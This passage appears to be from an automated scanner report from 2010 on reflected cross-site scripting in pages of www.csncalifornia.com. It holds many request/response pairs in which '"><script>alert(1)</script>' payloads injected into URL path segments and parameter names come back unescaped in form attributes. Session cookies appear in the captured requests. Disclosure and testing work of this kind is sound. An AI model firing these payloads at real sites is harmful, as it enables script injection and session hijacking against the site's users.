This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html?36a52"><script>alert(1)</script>9406270512a=1 HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:50 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 55296
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <input type=hidden name="36a52"><script>alert(1)</script>9406270512a" id = "36a52"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70697"><script>alert(1)</script>1804d5ee4fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /1270697"><script>alert(1)</script>1804d5ee4fd/16/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:31 GMT Connection: close Connection: Transfer-Encoding Content-Length: 41036
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/1270697"><script>alert(1)</script>1804d5ee4fd/16/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5216"><script>alert(1)</script>f2573155745 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/16b5216"><script>alert(1)</script>f2573155745/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:32 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 41036
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/16b5216"><script>alert(1)</script>f2573155745/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57718"><script>alert(1)</script>e68fb5e70dd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/16/1057718"><script>alert(1)</script>e68fb5e70dd/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 41017
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/16/1057718"><script>alert(1)</script>e68fb5e70dd/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 281c4"><script>alert(1)</script>34004d1a473 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/16/10/img-srchttpcsnbayareacomcommonglobal_ima281c4"><script>alert(1)</script>34004d1a473/landing_maiocco_v3.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 41036
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/16/10/img-srchttpcsnbayareacomcommonglobal_ima281c4"><script>alert(1)</script>34004d1a473/landing_maiocco_v3.html"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbcd4"><script>alert(1)</script>0ee47242d1f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12fbcd4"><script>alert(1)</script>0ee47242d1f/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:49 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:49 GMT Connection: close Connection: Transfer-Encoding Content-Length: 55878
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12fbcd4"><script>alert(1)</script>0ee47242d1f/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a388d"><script>alert(1)</script>9f4a1806180 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17a388d"><script>alert(1)</script>9f4a1806180/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 55878
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/17a388d"><script>alert(1)</script>9f4a1806180/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a32d"><script>alert(1)</script>12f9844ae10 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/106a32d"><script>alert(1)</script>12f9844ae10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 55878
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/17/106a32d"><script>alert(1)</script>12f9844ae10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcc7a"><script>alert(1)</script>7cd78c0a049 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/As-claim-RHP-Humber-off-waivers-from-Royfcc7a"><script>alert(1)</script>7cd78c0a049/landing_athletics.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:11 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:11 GMT Connection: close Connection: Transfer-Encoding Content-Length: 55859
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/17/10/As-claim-RHP-Humber-off-waivers-from-Royfcc7a"><script>alert(1)</script>7cd78c0a049/landing_athletics.html"> ...[SNIP]...
2.264. http://www.csncalifornia.com/12/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf5af"><script>alert(1)</script>5c392a695db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html?bf5af"><script>alert(1)</script>5c392a695db=1 HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:47 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:47 GMT Connection: close Connection: Transfer-Encoding Content-Length: 55822
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <input type=hidden name="bf5af"><script>alert(1)</script>5c392a695db" id = "bf5af"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ca61"><script>alert(1)</script>08389237d76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /122ca61"><script>alert(1)</script>08389237d76/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:48 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:48 GMT Connection: close Connection: Transfer-Encoding Content-Length: 41036
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/122ca61"><script>alert(1)</script>08389237d76/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d2f7"><script>alert(1)</script>ba163911b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/172d2f7"><script>alert(1)</script>ba163911b6/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:50 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 41035
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/172d2f7"><script>alert(1)</script>ba163911b6/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65fe8"><script>alert(1)</script>05e1ea8573e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/1065fe8"><script>alert(1)</script>05e1ea8573e/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 41017
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/17/1065fe8"><script>alert(1)</script>05e1ea8573e/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 583e7"><script>alert(1)</script>fcf10942d4d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/Maiocco-Singletary-again-weighs-which-Sm583e7"><script>alert(1)</script>fcf10942d4d/landing_maiocco_v3.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:52 GMT Connection: close Connection: Transfer-Encoding Content-Length: 41036
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/17/10/Maiocco-Singletary-again-weighs-which-Sm583e7"><script>alert(1)</script>fcf10942d4d/landing_maiocco_v3.html"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b049f"><script>alert(1)</script>f73d3656f88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12b049f"><script>alert(1)</script>f73d3656f88/17/10/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:47 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:47 GMT Connection: close Connection: Transfer-Encoding Content-Length: 42259
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12b049f"><script>alert(1)</script>f73d3656f88/17/10/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f57d6"><script>alert(1)</script>506006193ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17f57d6"><script>alert(1)</script>506006193ac/10/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:49 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:49 GMT Connection: close Connection: Transfer-Encoding Content-Length: 42259
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/17f57d6"><script>alert(1)</script>506006193ac/10/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa447"><script>alert(1)</script>26243a634b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10fa447"><script>alert(1)</script>26243a634b3/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:50 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 42240
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/17/10fa447"><script>alert(1)</script>26243a634b3/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8532"><script>alert(1)</script>31424100d05 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/Steinmetz-NBA-Power-Rankings-121710e8532"><script>alert(1)</script>31424100d05/landing_steinmetz_v3.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 42259
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/17/10/Steinmetz-NBA-Power-Rankings-121710e8532"><script>alert(1)</script>31424100d05/landing_steinmetz_v3.html"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b73b"><script>alert(1)</script>ff256d6f68f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /123b73b"><script>alert(1)</script>ff256d6f68f/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:52 GMT Connection: close Connection: Transfer-Encoding Content-Length: 40247
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/123b73b"><script>alert(1)</script>ff256d6f68f/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf117"><script>alert(1)</script>047b6a36e86 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
